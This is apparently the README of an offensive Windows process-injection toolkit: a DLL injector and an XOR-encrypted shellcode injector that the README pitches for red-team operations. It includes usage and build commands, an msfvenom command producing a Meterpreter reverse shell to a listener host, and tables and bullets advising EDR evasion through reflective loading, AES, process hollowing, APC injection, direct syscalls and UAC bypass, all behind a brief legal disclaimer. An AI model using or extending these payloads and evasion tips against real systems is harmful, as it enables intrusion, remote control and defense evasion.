Tools for implementing Windows processes, including implementing DLL libraries and implementing XOR-encrypted shellcode. Includes architecture verification and error handling
This project is for educational and authorized security research only. Unauthorized use, including but not limited to attacking systems without explicit owner consent, is strictly prohibited and violates international cybercrime lawsBy using this toolkit, you agree to:
- Legal Compliance: Use only on systems you own or have written authorization to test
- Ethical Responsibility: Never engage in malicious activities or data destruction
- Full Liability: Assume all legal/financial consequences for misuse
| Feature | DLL Injector | Shellcode Injector |
|---|---|---|
| Injection Method | CreateRemoteThread + LoadLibraryW |
Direct memory execution + XOR decryption |
| Payload Delivery | On-disk DLL | Fully in-memory |
| Memory Protection | PAGE_READWRITE |
PAGE_EXECUTE_READWRITE (DEP bypass) |
| Architecture Control | Manual matching required | Auto-detection via IsWow64Process |
| Obfuscation | None | XOR encryption (key: 0xAA) |
| Payload Types | Standard DLLs | Staged/Non-staged (CS/Meterpreter compatible) |
| Error Reporting | Win32 error codes | Detailed codes + execution timeout |
| Cleanup | Full handle/memory release | Post-execution sanitization |
| Ideal For | Game modding, debug hooks | Red team operations, EDR research |
Test DLL Creation:
// test_dll.cpp
#include <windows.h>
extern "C" __declspec(dllexport) void EntryPoint() {
MessageBoxA(0, "Injected!", "Success", MB_OK);
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason, LPVOID lpReserved) {
if (ul_reason == DLL_PROCESS_ATTACH) EntryPoint();
return TRUE;
}Execution:
.\dll-injector.exe (Get-Process notepad).Id "C:\test-payload.dll"Payload Generation:
msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=666 -f typeCode Integration:
// shellcode-injector.cpp
unsigned char shellcode[] = {
...
};Execution:
shellcode-injector.exe 1472# x64
x86_64-w64-mingw32-g++ dll-injector.cpp -o dll-injector.exe -static -lws2_32 -s -Os
# x86
i686-w64-mingw32-g++ dll-injector.cpp -o dll-injector32.exe -static -lws2_32 -s -Os
# Flags: -s (strip symbols), -Os (optimize for size) - optionally# x64
x86_64-w64-mingw32-g++ shellcode-injector.cpp -o shellcode-injector.exe -static -lwin32 -s -Os
# x86
i686-w64-mingw32-g++ shellcode-injector.cpp -o shellcode-injector32.exe -static -lwin32 -s -Os
# Flags: -s (strip symbols), -Os (optimize for size) - optionally| Technique | Detection Risk | Mitigation Tips |
|---|---|---|
| Classic DLL Injection | High | Use reflective DLL loading |
| XOR Encryption | Medium | Implement AES + runtime key derivation |
| RWX Memory | Critical | Use NTAPI calls NtAllocateVirtualMemory + memory section mapping |
| Remote Threads | High | Leverage process hollowing or APC queue injection |
- EDR Bypass: This toolkit does not implement advanced evasion techniques. Always:
- Test in isolated environments
- Combine with process spoofing/UAC bypass
- Use custom syscalls instead of WinAPI
- Shellcode Requirements:
- Position-independent (PIC)
- Null-byte free (if using XOR)
- Debugging:
#ifdef _DEBUG
printf("[+] Allocated memory at 0x%p\n", remoteBuffer);
#endifTelegram Group: t.me/initial_persistence
Email: tylerblackout17@gmail.com